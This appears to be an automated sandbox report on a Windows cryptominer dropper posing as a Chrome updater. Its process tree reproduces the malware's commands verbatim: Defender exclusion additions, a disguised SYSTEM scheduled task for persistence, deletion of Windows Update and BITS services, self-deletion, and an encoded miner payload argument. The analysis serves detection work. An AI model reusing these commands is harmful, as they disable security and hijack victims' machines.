Analysis
-
max time kernel
150s -
max time network
146s -
platform
windows10-2004_x64 -
resource
win10v2004-20220812-en -
resource tags
-
submitted
26-09-2022 18:52
General
-
Target
UNNAMED3.exe
-
Size
9.1MB
-
MD5
223ce6bb95cc6072b3c08cdcdf6b2944
-
SHA1
a55afd57e0862347574680bda2ea42ccb6c31bce
-
SHA256
39cc2423c2cd157014637802833c3b70f9b6cc5ff3e3247b15949eded3cb8d62
-
SHA512
a34ecf9dc5dae22f37d3697a5c4050261ca98f22f3f88108c9c63f02911fe64ed1be9b8608211b8440cb19fd5dbac423d1bbe1c5e70f2e31f0043b8ebbd4daa6
-
SSDEEP
196608:u4Fk4ptoPqwTIr2TLd6bHpYLCWcOge52Tmt6qR5bar/ytJGuDrLygLgF:BFTptrzgLsOWOgED5Rxarat2
Score
10/10
Malware Config
Signatures
-
Modifies security service 2 TTPs 5 IoCs
-
Suspicious use of NtCreateUserProcessOtherParentProcess 12 IoCs
-
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
-
XMRig Miner payload 2 IoCs
-
Drops file in Drivers directory 2 IoCs
-
Executes dropped EXE 1 IoCs
-
Stops running service(s) 3 TTPs
-
UPX packed file 2 IoCs
Detects executables packed with UPX/modified UPX open source packer.
-
Drops file in System32 directory 3 IoCs
-
Suspicious use of NtSetInformationThreadHideFromDebugger 4 IoCs
-
Suspicious use of SetThreadContext 2 IoCs
-
Drops file in Program Files directory 4 IoCs
-
Launches sc.exe 10 IoCs
Sc.exe is a Windows utlilty to control services on the system.
-
Modifies data under HKEY_USERS 64 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: LoadsDriver 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of WriteProcessMemory 48 IoCs
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
-
C:\Users\Admin\AppData\Local\Temp\UNNAMED3.exe"C:\Users\Admin\AppData\Local\Temp\UNNAMED3.exe"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe <#thakcjdi#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'Google' /tr '''C:\Program Files\Google\chromeupdater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\chromeupdater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Google' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Google" /t REG_SZ /f /d 'C:\Program Files\Google\chromeupdater.exe' }2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop bits3⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop dosvc3⤵
- Launches sc.exe
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f3⤵
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f3⤵
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f3⤵
- Modifies security service
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f3⤵
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\UNNAMED3.exe"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵
-
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe <#nkdsuy#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "Google" } Else { "C:\Program Files\Google\chromeupdater.exe" }2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /run /tn Google3⤵
-
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop bits3⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop dosvc3⤵
- Launches sc.exe
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f3⤵
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f3⤵
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f3⤵
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f3⤵
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f3⤵
-
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe <#thakcjdi#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'Google' /tr '''C:\Program Files\Google\chromeupdater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\chromeupdater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Google' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Google" /t REG_SZ /f /d 'C:\Program Files\Google\chromeupdater.exe' }2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\conhost.exeC:\Windows\system32\conhost.exe wwahllplg2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"2⤵
- Drops file in Program Files directory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"2⤵
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\Wbem\WMIC.exewmic PATH Win32_VideoController GET Name, VideoProcessor3⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe iulcjduawyyezjwe 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2⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files\Google\chromeupdater.exe"C:\Program Files\Google\chromeupdater.exe"1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Program Files\Google\Libs\g.logFilesize
226B
MD5fdba80d4081c28c65e32fff246dc46cb
SHA174f809dedd1fc46a3a63ac9904c80f0b817b3686
SHA256b9a385645ec2edddbc88b01e6b21362c14e9d7895712e67d375874eb7308e398
SHA512b24a6784443c85bb56f8ae401ad4553c0955f587671ec7960bda737901d677d5e15d1a47d3674505fc98ea09ede2e5078a0aeb4481d3728e6715f3eac557cd29
-
C:\Program Files\Google\chromeupdater.exeFilesize
9.1MB
MD52276c767a4e487885ab8d979c6e66878
SHA1fd7a9df4d7e68031109f4c7b5de6a0fc424c160e
SHA25637d4dbf6abbe35855e329fa4a955cec618781f8f90d223c988fb205304fe2317
SHA5124f51cf617bfd006f86d0fa89b2ded7dc7ebdece8715313fd43bd1560e0d58a1e997dda15ba2df1ad140cdd8af4403628ea8f3967439d7774435f8f43ad7abc1b
-
C:\Program Files\Google\chromeupdater.exeFilesize
9.1MB
MD52276c767a4e487885ab8d979c6e66878
SHA1fd7a9df4d7e68031109f4c7b5de6a0fc424c160e
SHA25637d4dbf6abbe35855e329fa4a955cec618781f8f90d223c988fb205304fe2317
SHA5124f51cf617bfd006f86d0fa89b2ded7dc7ebdece8715313fd43bd1560e0d58a1e997dda15ba2df1ad140cdd8af4403628ea8f3967439d7774435f8f43ad7abc1b
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.logFilesize
2KB
MD5d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
SHA25684739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA5128c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
944B
MD522fbec4acba323d04079a263526cef3c
SHA1eb8dd0042c6a3f20087a7d2391eaf48121f98740
SHA256020e5d769893724f075e10b01c59bf2424214cefe6aafbab6f44bc700f525c40
SHA512fb61d737de8cbed6b7d8b5a35911c46ef26a2927a52ed7add9d594cf19dcab1b9978b61912c6f3fe4f29228f4454fb022fb2e167788c727dc6503c1fcd42159e
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD55b9a7ee9a9286faef39bbe9cac042fd4
SHA1cb3ef3c9e19781c45ffd9e2902e5b0ed38c0e2c3
SHA256a6d5d07c333b6a68534ebc0ee23ea49e77a67f26597e4bd5bcc8dfd216e6a348
SHA512ea14a4932134952864bd1b0ccdfd6ad45ed650a9bc52589f6d21fc4382a6237c6bbce1c016482b4a68cd609dadea234726927ba0f26e9443a6b970209281f450
-
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.logFilesize
4KB
MD5bdb25c22d14ec917e30faf353826c5de
SHA16c2feb9cea9237bc28842ebf2fea68b3bd7ad190
SHA256e3274ce8296f2cd20e3189576fbadbfa0f1817cdf313487945c80e968589a495
SHA512b5eddbfd4748298a302e2963cfd12d849130b6dcb8f0f85a2a623caed0ff9bd88f4ec726f646dbebfca4964adc35f882ec205113920cb546cc08193739d6728c
-
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD5b42c70c1dbf0d1d477ec86902db9e986
SHA11d1c0a670748b3d10bee8272e5d67a4fabefd31f
SHA2568ed3b348989cdc967d1fc0e887b2a2f5a656680d8d14ebd3cb71a10c2f55867a
SHA51257fb278a8b2e83d01fac2a031c90e0e2bd5e4c1a360cfa4308490eb07e1b9d265b1f28399d0f10b141a6438ba92dd5f9ce4f18530ec277fece0eb7678041cbc5
-
C:\Windows\system32\drivers\etc\hostsFilesize
2KB
MD57aa727c416bcf0287c76aec520a41a23
SHA15f770c8fb6be09cf11d7ee8e2e320278a167172f
SHA25639f607fbb5bfcfc5c394645fd9b718de1c714b363b17a4dd992ef2084eda8e53
SHA512ce032701727b0c1e5945e1fde4e4dbc8e48be60dba71377e3741b80f74951c023a4d8e633d1ff1087054e5aba2764d9af97cc3ff6529a98be1907834ec3a78e6
-
memory/536-185-0x0000000000000000-mapping.dmp
-
memory/620-139-0x0000000000000000-mapping.dmp
-
memory/932-179-0x0000000000000000-mapping.dmp
-
memory/1112-194-0x000001710A490000-0x000001710A4B0000-memory.dmpFilesize
128KB
-
memory/1112-195-0x00007FF6AA1F0000-0x00007FF6AA9E4000-memory.dmpFilesize
8.0MB
-
memory/1112-196-0x000001710A4D0000-0x000001710A510000-memory.dmpFilesize
256KB
-
memory/1112-197-0x00007FF6AA1F0000-0x00007FF6AA9E4000-memory.dmpFilesize
8.0MB
-
memory/1112-192-0x00007FF6AA9E2120-mapping.dmp
-
memory/1112-198-0x000001710A550000-0x000001710A570000-memory.dmpFilesize
128KB
-
memory/1112-199-0x000001710A550000-0x000001710A570000-memory.dmpFilesize
128KB
-
memory/1184-148-0x0000000000000000-mapping.dmp
-
memory/1516-155-0x0000000000000000-mapping.dmp
-
memory/1568-147-0x0000000000000000-mapping.dmp
-
memory/1876-193-0x00007FF688E90000-0x00007FF689E6C000-memory.dmpFilesize
15.9MB
-
